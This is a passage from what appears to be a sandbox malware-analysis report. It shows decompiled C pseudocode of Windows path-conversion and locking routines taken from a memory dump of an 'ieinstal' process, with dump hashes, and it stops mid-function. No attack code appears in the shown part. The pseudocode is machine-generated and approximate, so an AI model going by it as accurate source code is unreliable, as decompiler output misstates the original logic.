                        0x1edd5f11
                        0x1edd5f18
                        0x1edd5eea
                        0x1edd5eea
                        0x1edd5eed
                        0x1edd5ef2
                        0x1edd5ef8
                        0x1edd5efb
                        0x1edd5f0a
                        0x1edd5f0a
                        0x1edd5eed
                        0x1edd5ee8
                        0x1edd5f22
                        0x1edd5f28
                        0x00000000
                        0x00000000
                        0x1edd5f30
                        0x1edd5f31
                        0x1edd5f37
                        0x1edd5f3a
                        0x1edd5f3d
                        0x1edd5f44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd5f46
                        0x1edd5f48
                        0x1edd5f4d
                        0x00000000
                        0x1edd5f4d
                        0x1edd5dda
                        0x1edd5ddf
                        0x00000000
                        0x1edd5ddf
                        0x1edd5dd8
                        0x1edd5da7
                        0x1edd5da9
                        0x1edd5dac
                        0x1edd5dae
                        0x00000000
                        0x1edd5db4
                        0x1edd5db4
                        0x00000000
                        0x1edd5db4
                        0x1edd5dae
                        0x1edd5d88
                        0x1edd5d8d
                        0x1edd6363
                        0x1edd6369
                        0x1edd636a
                        0x1edd6370
                        0x1edd6372
                        0x1edd637a
                        0x1edd637b
                        0x1edd637d
                        0x00000000
                        0x00000000
                        0x1edd637f
                        0x1edd6385
                        0x00000000
                        0x1edd6385
                        0x1edd5d38
                        0x1edd5d3b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd5d3b
                        0x1edd5d27
                        0x1edd5d29
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd6360
                        0x00000000
                        0x1edd6360
                        0x1edd5c10
                        0x1edd5c10
                        0x1edd63da
                        0x1edd63e5
                        0x1edd63e5

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c5e15708d761917290b24ec074f9c225d6d93690687b5fdcabc71dd8ae03206c
                        • Instruction ID: 343b471e36c3fba6416318b61f32ff35602a1bf8adbe33b136dc608e0691eb7e
                        • Opcode Fuzzy Hash: c5e15708d761917290b24ec074f9c225d6d93690687b5fdcabc71dd8ae03206c
                        • Instruction Fuzzy Hash: 66425B75D10369CFDB20CF68C890BA9B7B1FF45304F1582AAD95DAB281D734A989CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E1ED24120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                        				signed int _v8;
                        				void* _v20;
                        				signed int _v24;
                        				char _v532;
                        				char _v540;
                        				signed short _v544;
                        				signed int _v548;
                        				signed short* _v552;
                        				signed short _v556;
                        				signed short* _v560;
                        				signed short* _v564;
                        				signed short* _v568;
                        				void* _v570;
                        				signed short* _v572;
                        				signed short _v576;
                        				signed int _v580;
                        				char _v581;
                        				void* _v584;
                        				unsigned int _v588;
                        				signed short* _v592;
                        				void* _v597;
                        				void* _v600;
                        				void* _v604;
                        				void* _v609;
                        				void* _v616;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				unsigned int _t161;
                        				signed int _t162;
                        				unsigned int _t163;
                        				void* _t169;
                        				signed short _t173;
                        				signed short _t177;
                        				signed short _t181;
                        				unsigned int _t182;
                        				signed int _t185;
                        				signed int _t213;
                        				signed int _t225;
                        				short _t233;
                        				signed char _t234;
                        				signed int _t242;
                        				signed int _t243;
                        				signed int _t244;
                        				signed int _t245;
                        				signed int _t250;
                        				void* _t251;
                        				signed short* _t254;
                        				void* _t255;
                        				signed int _t256;
                        				void* _t257;
                        				signed short* _t260;
                        				signed short _t265;
                        				signed short* _t269;
                        				signed short _t271;
                        				signed short** _t272;
                        				signed short* _t275;
                        				signed short _t282;
                        				signed short _t283;
                        				signed short _t290;
                        				signed short _t299;
                        				signed short _t307;
                        				signed int _t308;
                        				signed short _t311;
                        				signed short* _t315;
                        				signed short _t316;
                        				void* _t317;
                        				void* _t319;
                        				signed short* _t321;
                        				void* _t322;
                        				void* _t323;
                        				unsigned int _t324;
                        				signed int _t325;
                        				void* _t326;
                        				signed int _t327;
                        				signed int _t329;
                        
                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                        				_v8 =  *0x1edfd360 ^ _t329;
                        				_t157 = _a8;
                        				_t321 = _a4;
                        				_t315 = __edx;
                        				_v548 = __ecx;
                        				_t305 = _a20;
                        				_v560 = _a12;
                        				_t260 = _a16;
                        				_v564 = __edx;
                        				_v580 = _a8;
                        				_v572 = _t260;
                        				_v544 = _a20;
                        				if( *__edx <= 8) {
                        					L3:
                        					if(_t260 != 0) {
                        						 *_t260 = 0;
                        					}
                        					_t254 =  &_v532;
                        					_v588 = 0x208;
                        					if((_v548 & 0x00000001) != 0) {
                        						_v556 =  *_t315;
                        						_v552 = _t315[2];
                        						_t161 = E1ED3F232( &_v556);
                        						_t316 = _v556;
                        						_v540 = _t161;
                        						goto L17;
                        					} else {
                        						_t306 = 0x208;
                        						_t298 = _t315;
                        						_t316 = E1ED26E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                        						if(_t316 == 0) {
                        							L68:
                        							_t322 = 0xc0000033;
                        							goto L39;
                        						} else {
                        							while(_v581 == 0) {
                        								_t233 = _v588;
                        								if(_t316 > _t233) {
                        									_t234 = _v548;
                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                        										_t254 = L1ED24620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                        										if(_t254 == 0) {
                        											_t169 = 0xc0000017;
                        										} else {
                        											_t298 = _v564;
                        											_v588 = _t316;
                        											_t306 = _t316;
                        											_t316 = E1ED26E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                        											if(_t316 != 0) {
                        												continue;
                        											} else {
                        												goto L68;
                        											}
                        										}
                        									} else {
                        										goto L90;
                        									}
                        								} else {
                        									_v556 = _t316;
                        									 *((short*)(_t329 + 0x32)) = _t233;
                        									_v552 = _t254;
                        									if(_t316 < 2) {
                        										L11:
                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                        											_t161 = 5;
                        										} else {
                        											if(_t316 < 6) {
                        												L87:
                        												_t161 = 3;
                        											} else {
                        												_t242 = _t254[2] & 0x0000ffff;
                        												if(_t242 != 0x5c) {
                        													if(_t242 == 0x2f) {
                        														goto L16;
                        													} else {
                        														goto L87;
                        													}
                        													goto L101;
                        												} else {
                        													L16:
                        													_t161 = 2;
                        												}
                        											}
                        										}
                        									} else {
                        										_t243 =  *_t254 & 0x0000ffff;
                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                        											if(_t316 < 4) {
                        												L81:
                        												_t161 = 4;
                        												goto L17;
                        											} else {
                        												_t244 = _t254[1] & 0x0000ffff;
                        												if(_t244 != 0x5c) {
                        													if(_t244 == 0x2f) {
                        														goto L60;
                        													} else {
                        														goto L81;
                        													}
                        												} else {
                        													L60:
                        													if(_t316 < 6) {
                        														L83:
                        														_t161 = 1;
                        														goto L17;
                        													} else {
                        														_t245 = _t254[2] & 0x0000ffff;
                        														if(_t245 != 0x2e) {
                        															if(_t245 == 0x3f) {
                        																goto L62;
                        															} else {
                        																goto L83;
                        															}
                        														} else {
                        															L62:
                        															if(_t316 < 8) {
                        																L85:
                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                        																goto L17;
                        															} else {
                        																_t250 = _t254[3] & 0x0000ffff;
                        																if(_t250 != 0x5c) {
                        																	if(_t250 == 0x2f) {
                        																		goto L64;
                        																	} else {
                        																		goto L85;
                        																	}
                        																} else {
                        																	L64:
                        																	_t161 = 6;
                        																	goto L17;
                        																}
                        															}
                        														}
                        													}
                        												}
                        											}
                        											goto L101;
                        										} else {
                        											goto L11;
                        										}
                        									}
                        									L17:
                        									if(_t161 != 2) {
                        										_t162 = _t161 - 1;
                        										if(_t162 > 5) {
                        											goto L18;
                        										} else {
                        											switch( *((intOrPtr*)(_t162 * 4 +  &M1ED245F8))) {
                        												case 0:
                        													_v568 = 0x1ece1078;
                        													__eax = 2;
                        													goto L20;
                        												case 1:
                        													goto L18;
                        												case 2:
                        													_t163 = 4;
                        													goto L19;
                        											}
                        										}
                        										goto L41;
                        									} else {
                        										L18:
                        										_t163 = 0;
                        										L19:
                        										_v568 = 0x1ece11c4;
                        									}
                        									L20:
                        									_v588 = _t163;
                        									_v564 = _t163 + _t163;
                        									_t306 =  *_v568 & 0x0000ffff;
                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                        									_v576 = _t265;
                        									if(_t265 > 0xfffe) {
                        										L90:
                        										_t322 = 0xc0000106;
                        									} else {
                        										if(_t321 != 0) {
                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                        												if(_v580 != 0) {
                        													goto L23;
                        												} else {
                        													_t322 = 0xc0000106;
                        													goto L39;
                        												}
                        											} else {
                        												_t177 = _t306;
                        												goto L25;
                        											}
                        											goto L101;
                        										} else {
                        											if(_v580 == _t321) {
                        												_t322 = 0xc000000d;
                        											} else {
                        												L23:
                        												_t173 = L1ED24620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                        												_t269 = _v592;
                        												_t269[2] = _t173;
                        												if(_t173 == 0) {
                        													_t322 = 0xc0000017;
                        												} else {
                        													_t316 = _v556;
                        													 *_t269 = 0;
                        													_t321 = _t269;
                        													_t269[1] = _v576;
                        													_t177 =  *_v568 & 0x0000ffff;
                        													L25:
                        													_v580 = _t177;
                        													if(_t177 == 0) {
                        														L29:
                        														_t307 =  *_t321 & 0x0000ffff;
                        													} else {
                        														_t290 =  *_t321 & 0x0000ffff;
                        														_v576 = _t290;
                        														_t310 = _t177 & 0x0000ffff;
                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                        															_t307 =  *_t321 & 0xffff;
                        														} else {
                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                        															E1ED4F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                        															_t329 = _t329 + 0xc;
                        															_t311 = _v580;
                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                        															 *_t321 = _t225;
                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                        															}
                        															goto L29;
                        														}
                        													}
                        													_t271 = _v556 - _v588 + _v588;
                        													_v580 = _t307;
                        													_v576 = _t271;
                        													if(_t271 != 0) {
                        														_t308 = _t271 & 0x0000ffff;
                        														_v588 = _t308;
                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                        															E1ED4F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                        															_t329 = _t329 + 0xc;
                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                        															 *_t321 = _t213;
                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                        															}
                        														}
                        													}
                        													_t272 = _v560;
                        													if(_t272 != 0) {
                        														 *_t272 = _t321;
                        													}
                        													_t306 = 0;
                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                        													_t275 = _v572;
                        													if(_t275 != 0) {
                        														_t306 =  *_t275;
                        														if(_t306 != 0) {
                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                        														}
                        													}
                        													_t181 = _v544;
                        													if(_t181 != 0) {
                        														 *_t181 = 0;
                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                        														if(_v540 == 5) {
                        															_t182 = E1ED052A5(1);
                        															_v588 = _t182;
                        															if(_t182 == 0) {
                        																E1ED1EB70(1, 0x1edf79a0);
                        																goto L38;
                        															} else {
                        																_v560 = _t182 + 0xc;
                        																_t185 = E1ED1AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                        																if(_t185 == 0) {
                        																	_t324 = _v588;
                        																	goto L97;
                        																} else {
                        																	_t306 = _v544;
                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                        																	 *(_t306 + 4) = _t282;
                        																	_v576 = _t282;
                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                        																	 *_t306 = _t325;
                        																	if( *_t282 == 0x5c) {
                        																		_t149 = _t325 - 2; // -2
                        																		_t283 = _t149;
                        																		 *_t306 = _t283;
                        																		 *(_t306 + 4) = _v576 + 2;
                        																		_t185 = _t283 & 0x0000ffff;
                        																	}
                        																	_t324 = _v588;
                        																	 *(_t306 + 2) = _t185;
                        																	if((_v548 & 0x00000002) == 0) {
                        																		L97:
                        																		asm("lock xadd [esi], eax");
                        																		if((_t185 | 0xffffffff) == 0) {
                        																			_push( *((intOrPtr*)(_t324 + 4)));
                        																			E1ED495D0();
                        																			L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                        																		}
                        																	} else {
                        																		 *(_t306 + 0xc) = _t324;
                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                        																	}
                        																	goto L38;
                        																}
                        															}
                        															goto L41;
                        														}
                        													}
                        													L38:
                        													_t322 = 0;
                        												}
                        											}
                        										}
                        									}
                        									L39:
                        									if(_t254 !=  &_v532) {
                        										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                        									}
                        									_t169 = _t322;
                        								}
                        								goto L41;
                        							}
                        							goto L68;
                        						}
                        					}
                        					L41:
                        					_pop(_t317);
                        					_pop(_t323);
                        					_pop(_t255);
                        					return E1ED4B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                        				} else {
                        					_t299 = __edx[2];
                        					if( *_t299 == 0x5c) {
                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                        						if(_t256 != 0x5c) {
                        							if(_t256 != 0x3f) {
                        								goto L2;
                        							} else {
                        								goto L50;
                        							}
                        						} else {
                        							L50:
                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                        								goto L2;
                        							} else {
                        								_t251 = E1ED43D43(_t315, _t321, _t157, _v560, _v572, _t305);
                        								_pop(_t319);
                        								_pop(_t326);
                        								_pop(_t257);
                        								return E1ED4B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                        							}
                        						}
                        					} else {
                        						L2:
                        						_t260 = _v572;
                        						goto L3;
                        					}
                        				}
                        				L101:
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1842fe399071fa3c3f93a40f8b78b6cf7f386a8ad86d4b31b585c643b88f33f
                        • Instruction ID: 78272e2fa80525723b54b36a9dd443015f84e45132cecde4e1f87b4f55c8ff72
                        • Opcode Fuzzy Hash: e1842fe399071fa3c3f93a40f8b78b6cf7f386a8ad86d4b31b585c643b88f33f
                        • Instruction Fuzzy Hash: EFF17F749082528FC714CF15C590A2AB7F2FF88718F958A2EF8C6CB290E774D991CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E1ED320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                        				signed int _v16;
                        				signed int _v20;
                        				signed char _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				void* _v36;
                        				char _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				unsigned int _v60;
                        				char _v64;
                        				unsigned int _v68;
                        				signed int _v72;
                        				char _v73;
                        				signed int _v74;
                        				char _v75;
                        				signed int _v76;
                        				void* _v81;
                        				void* _v82;
                        				void* _v89;
                        				void* _v92;
                        				void* _v97;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char _t128;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				signed char _t133;
                        				intOrPtr _t135;
                        				signed int _t137;
                        				signed int _t140;
                        				signed int* _t144;
                        				signed int* _t145;
                        				intOrPtr _t146;
                        				signed int _t147;
                        				signed char* _t148;
                        				signed int _t149;
                        				signed int _t153;
                        				signed int _t169;
                        				signed int _t174;
                        				signed int _t180;
                        				void* _t197;
                        				void* _t198;
                        				signed int _t201;
                        				intOrPtr* _t202;
                        				intOrPtr* _t205;
                        				signed int _t210;
                        				signed int _t215;
                        				signed int _t218;
                        				signed char _t221;
                        				signed int _t226;
                        				char _t227;
                        				signed int _t228;
                        				void* _t229;
                        				unsigned int _t231;
                        				void* _t235;
                        				signed int _t240;
                        				signed int _t241;
                        				void* _t242;
                        				signed int _t246;
                        				signed int _t248;
                        				signed int _t252;
                        				signed int _t253;
                        				void* _t254;
                        				intOrPtr* _t256;
                        				intOrPtr _t257;
                        				unsigned int _t262;
                        				signed int _t265;
                        				void* _t267;
                        				signed int _t275;
                        
                        				_t198 = __ebx;
                        				_t267 = (_t265 & 0xfffffff0) - 0x48;
                        				_v68 = __ecx;
                        				_v73 = 0;
                        				_t201 = __edx & 0x00002000;
                        				_t128 = __edx & 0xffffdfff;
                        				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                        				_v72 = _t128;
                        				if((_t128 & 0x00000008) != 0) {
                        					__eflags = _t128 - 8;
                        					if(_t128 != 8) {
                        						L69:
                        						_t129 = 0xc000000d;
                        						goto L23;
                        					} else {
                        						_t130 = 0;
                        						_v72 = 0;
                        						_v75 = 1;
                        						L2:
                        						_v74 = 1;
                        						_t226 =  *0x1edf8714; // 0x0
                        						if(_t226 != 0) {
                        							__eflags = _t201;
                        							if(_t201 != 0) {
                        								L62:
                        								_v74 = 1;
                        								L63:
                        								_t130 = _t226 & 0xffffdfff;
                        								_v72 = _t130;
                        								goto L3;
                        							}
                        							_v74 = _t201;
                        							__eflags = _t226 & 0x00002000;
                        							if((_t226 & 0x00002000) == 0) {
                        								goto L63;
                        							}
                        							goto L62;
                        						}
                        						L3:
                        						_t227 = _v75;
                        						L4:
                        						_t240 = 0;
                        						_v56 = 0;
                        						_t252 = _t130 & 0x00000100;
                        						if(_t252 != 0 || _t227 != 0) {
                        							_t240 = _v68;
                        							_t132 = E1ED32EB0(_t240);
                        							__eflags = _t132 - 2;
                        							if(_t132 != 2) {
                        								__eflags = _t132 - 1;
                        								if(_t132 == 1) {
                        									goto L25;
                        								}
                        								__eflags = _t132 - 6;
                        								if(_t132 == 6) {
                        									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                        									if( *((short*)(_t240 + 4)) != 0x3f) {
                        										goto L40;
                        									}
                        									_t197 = E1ED32EB0(_t240 + 8);
                        									__eflags = _t197 - 2;
                        									if(_t197 == 2) {
                        										goto L25;
                        									}
                        								}
                        								L40:
                        								_t133 = 1;
                        								L26:
                        								_t228 = _v75;
                        								_v56 = _t240;
                        								__eflags = _t133;
                        								if(_t133 != 0) {
                        									__eflags = _t228;
                        									if(_t228 == 0) {
                        										L43:
                        										__eflags = _v72;
                        										if(_v72 == 0) {
                        											goto L8;
                        										}
                        										goto L69;
                        									}
                        									_t133 = E1ED058EC(_t240);
                        									_t221 =  *0x1edf5cac; // 0x16
                        									__eflags = _t221 & 0x00000040;
                        									if((_t221 & 0x00000040) != 0) {
                        										_t228 = 0;
                        										__eflags = _t252;
                        										if(_t252 != 0) {
                        											goto L43;
                        										}
                        										_t133 = _v72;
                        										goto L7;
                        									}
                        									goto L43;
                        								} else {
                        									_t133 = _v72;
                        									goto L6;
                        								}
                        							}
                        							L25:
                        							_t133 = _v73;
                        							goto L26;
                        						} else {
                        							L6:
                        							_t221 =  *0x1edf5cac; // 0x16
                        							L7:
                        							if(_t133 != 0) {
                        								__eflags = _t133 & 0x00001000;
                        								if((_t133 & 0x00001000) != 0) {
                        									_t133 = _t133 | 0x00000a00;
                        									__eflags = _t221 & 0x00000004;
                        									if((_t221 & 0x00000004) != 0) {
                        										_t133 = _t133 | 0x00000400;
                        									}
                        								}
                        								__eflags = _t228;
                        								if(_t228 != 0) {
                        									_t133 = _t133 | 0x00000100;
                        								}
                        								_t229 = E1ED44A2C(0x1edf6e40, 0x1ed44b30, _t133, _t240);
                        								__eflags = _t229;
                        								if(_t229 == 0) {
                        									_t202 = _a20;
                        									goto L100;
                        								} else {
                        									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                        									L15:
                        									_t202 = _a20;
                        									 *_t202 = _t135;
                        									if(_t229 == 0) {
                        										L100:
                        										 *_a4 = 0;
                        										_t137 = _a8;
                        										__eflags = _t137;
                        										if(_t137 != 0) {
                        											 *_t137 = 0;
                        										}
                        										 *_t202 = 0;
                        										_t129 = 0xc0000017;
                        										goto L23;
                        									} else {
                        										_t242 = _a16;
                        										if(_t242 != 0) {
                        											_t254 = _t229;
                        											memcpy(_t242, _t254, 0xd << 2);
                        											_t267 = _t267 + 0xc;
                        											_t242 = _t254 + 0x1a;
                        										}
                        										_t205 = _a4;
                        										_t25 = _t229 + 0x48; // 0x48
                        										 *_t205 = _t25;
                        										_t140 = _a8;
                        										if(_t140 != 0) {
                        											__eflags =  *((char*)(_t267 + 0xa));
                        											if( *((char*)(_t267 + 0xa)) != 0) {
                        												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                        											} else {
                        												 *_t140 = 0;
                        											}
                        										}
                        										_t256 = _a12;
                        										if(_t256 != 0) {
                        											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                        										}
                        										_t257 =  *_t205;
                        										_v48 = 0;
                        										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                        										_v56 = 0;
                        										_v52 = 0;
                        										_t144 =  *( *[fs:0x30] + 0x50);
                        										if(_t144 != 0) {
                        											__eflags =  *_t144;
                        											if( *_t144 == 0) {
                        												goto L20;
                        											}
                        											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        											goto L21;
                        										} else {
                        											L20:
                        											_t145 = 0x7ffe0384;
                        											L21:
                        											if( *_t145 != 0) {
                        												_t146 =  *[fs:0x30];
                        												__eflags =  *(_t146 + 0x240) & 0x00000004;
                        												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                        													_t147 = E1ED27D50();
                        													__eflags = _t147;
                        													if(_t147 == 0) {
                        														_t148 = 0x7ffe0385;
                        													} else {
                        														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        													}
                        													__eflags =  *_t148 & 0x00000020;
                        													if(( *_t148 & 0x00000020) != 0) {
                        														_t149 = _v72;
                        														__eflags = _t149;
                        														if(__eflags == 0) {
                        															_t149 = 0x1ece5c80;
                        														}
                        														_push(_t149);
                        														_push( &_v48);
                        														 *((char*)(_t267 + 0xb)) = E1ED3F6E0(_t198, _t242, _t257, __eflags);
                        														_push(_t257);
                        														_push( &_v64);
                        														_t153 = E1ED3F6E0(_t198, _t242, _t257, __eflags);
                        														__eflags =  *((char*)(_t267 + 0xb));
                        														if( *((char*)(_t267 + 0xb)) != 0) {
                        															__eflags = _t153;
                        															if(_t153 != 0) {
                        																__eflags = 0;
                        																E1ED87016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                        																L1ED22400(_t267 + 0x20);
                        															}
                        															L1ED22400( &_v64);
                        														}
                        													}
                        												}
                        											}
                        											_t129 = 0;
                        											L23:
                        											return _t129;
                        										}
                        									}
                        								}
                        							}
                        							L8:
                        							_t275 = _t240;
                        							if(_t275 != 0) {
                        								_v73 = 0;
                        								_t253 = 0;
                        								__eflags = 0;
                        								L29:
                        								_push(0);
                        								_t241 = E1ED32397(_t240);
                        								__eflags = _t241;
                        								if(_t241 == 0) {
                        									_t229 = 0;
                        									L14:
                        									_t135 = 0;
                        									goto L15;
                        								}
                        								__eflags =  *((char*)(_t267 + 0xb));
                        								 *(_t241 + 0x34) = 1;
                        								if( *((char*)(_t267 + 0xb)) != 0) {
                        									E1ED22280(_t134, 0x1edf8608);
                        									__eflags =  *0x1edf6e48 - _t253; // 0x30115b8
                        									if(__eflags != 0) {
                        										L48:
                        										_t253 = 0;
                        										__eflags = 0;
                        										L49:
                        										E1ED1FFB0(_t198, _t241, 0x1edf8608);
                        										__eflags = _t253;
                        										if(_t253 != 0) {
                        											L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                        										}
                        										goto L31;
                        									}
                        									 *0x1edf6e48 = _t241;
                        									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                        									__eflags = _t253;
                        									if(_t253 != 0) {
                        										_t57 = _t253 + 0x34;
                        										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                        										__eflags =  *_t57;
                        										if( *_t57 == 0) {
                        											goto L49;
                        										}
                        									}
                        									goto L48;
                        								}
                        								L31:
                        								_t229 = _t241;
                        								goto L14;
                        							}
                        							_v73 = 1;
                        							_v64 = _t240;
                        							asm("lock bts dword [esi], 0x0");
                        							if(_t275 < 0) {
                        								_t231 =  *0x1edf8608; // 0x0
                        								while(1) {
                        									_v60 = _t231;
                        									__eflags = _t231 & 0x00000001;
                        									if((_t231 & 0x00000001) != 0) {
                        										goto L76;
                        									}
                        									_t73 = _t231 + 1; // 0x1
                        									_t210 = _t73;
                        									asm("lock cmpxchg [edi], ecx");
                        									__eflags = _t231 - _t231;
                        									if(_t231 != _t231) {
                        										L92:
                        										_t133 = E1ED36B90(_t210,  &_v64);
                        										_t262 =  *0x1edf8608; // 0x0
                        										L93:
                        										_t231 = _t262;
                        										continue;
                        									}
                        									_t240 = _v56;
                        									goto L10;
                        									L76:
                        									_t169 = E1ED3E180(_t133);
                        									__eflags = _t169;
                        									if(_t169 != 0) {
                        										_push(0xc000004b);
                        										_push(0xffffffff);
                        										E1ED497C0();
                        										_t231 = _v68;
                        									}
                        									_v72 = 0;
                        									_v24 =  *( *[fs:0x18] + 0x24);
                        									_v16 = 3;
                        									_v28 = 0;
                        									__eflags = _t231 & 0x00000002;
                        									if((_t231 & 0x00000002) == 0) {
                        										_v32 =  &_v36;
                        										_t174 = _t231 >> 4;
                        										__eflags = 1 - _t174;
                        										_v20 = _t174;
                        										asm("sbb ecx, ecx");
                        										_t210 = 3 |  &_v36;
                        										__eflags = _t174;
                        										if(_t174 == 0) {
                        											_v20 = 0xfffffffe;
                        										}
                        									} else {
                        										_v32 = 0;
                        										_v20 = 0xffffffff;
                        										_v36 = _t231 & 0xfffffff0;
                        										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                        										_v72 =  !(_t231 >> 2) & 0xffffff01;
                        									}
                        									asm("lock cmpxchg [edi], esi");
                        									_t262 = _t231;
                        									__eflags = _t262 - _t231;
                        									if(_t262 != _t231) {
                        										goto L92;
                        									} else {
                        										__eflags = _v72;
                        										if(_v72 != 0) {
                        											E1ED4006A(0x1edf8608, _t210);
                        										}
                        										__eflags =  *0x7ffe036a - 1;
                        										if(__eflags <= 0) {
                        											L89:
                        											_t133 =  &_v16;
                        											asm("lock btr dword [eax], 0x1");
                        											if(__eflags >= 0) {
                        												goto L93;
                        											} else {
                        												goto L90;
                        											}
                        											do {
                        												L90:
                        												_push(0);
                        												_push(0x1edf8608);
                        												E1ED4B180();
                        												_t133 = _v24;
                        												__eflags = _t133 & 0x00000004;
                        											} while ((_t133 & 0x00000004) == 0);
                        											goto L93;
                        										} else {
                        											_t218 =  *0x1edf6904; // 0x400
                        											__eflags = _t218;
                        											if(__eflags == 0) {
                        												goto L89;
                        											} else {
                        												goto L87;
                        											}
                        											while(1) {
                        												L87:
                        												__eflags = _v16 & 0x00000002;
                        												if(__eflags == 0) {
                        													goto L89;
                        												}
                        												asm("pause");
                        												_t218 = _t218 - 1;
                        												__eflags = _t218;
                        												if(__eflags != 0) {
                        													continue;
                        												}
                        												goto L89;
                        											}
                        											goto L89;
                        										}
                        									}
                        								}
                        							}
                        							L10:
                        							_t229 =  *0x1edf6e48; // 0x30115b8
                        							_v72 = _t229;
                        							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        								E1ED1FFB0(_t198, _t240, 0x1edf8608);
                        								_t253 = _v76;
                        								goto L29;
                        							} else {
                        								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                        								asm("lock cmpxchg [esi], ecx");
                        								_t215 = 1;
                        								if(1 != 1) {
                        									while(1) {
                        										_t246 = _t215 & 0x00000006;
                        										_t180 = _t215;
                        										__eflags = _t246 - 2;
                        										_v56 = _t246;
